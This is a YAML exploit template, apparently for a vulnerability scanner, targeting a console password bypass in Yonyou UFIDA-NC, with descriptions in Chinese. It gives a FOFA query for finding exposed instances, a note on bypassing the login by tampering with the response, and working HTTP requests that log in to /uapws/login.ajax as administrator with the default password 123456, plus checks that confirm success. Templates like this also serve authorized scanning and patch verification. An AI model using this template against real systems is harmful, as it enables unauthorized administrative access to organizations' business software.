product: 用友UFIDA-NC
vName: 用友UFIDA-NC 控制台密码绕过
type: 访问控制
vID: [ ]
level: 3
vDesc: 用友UFIDA-NC控制台存在控制台密码绕过漏洞，攻击者可以输入默认密码123456或者抓取更改返回数据包实现任意用户登录。
version: ''
note: 漏洞存在,请在 /uapws/index.jsp 中输入任意密码，抓取返回的响应包修改为1即可绕过登陆
search:
  FOFA: app="用友-UFIDA-NC" && title=="产品登录界面"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17685126.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /uapws/
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '<title>WS-Console</title>'
              - 'basictable'
            logic: and
  - exp:
      method: post
      follow: false
      path: /uapws/login.ajax
      data: name=administrator&password=123456
    verify:
      path: ''
      logic: or
      check:
        - status: 200
          body:
            value:
              - '0'
              - '1'
            logic: or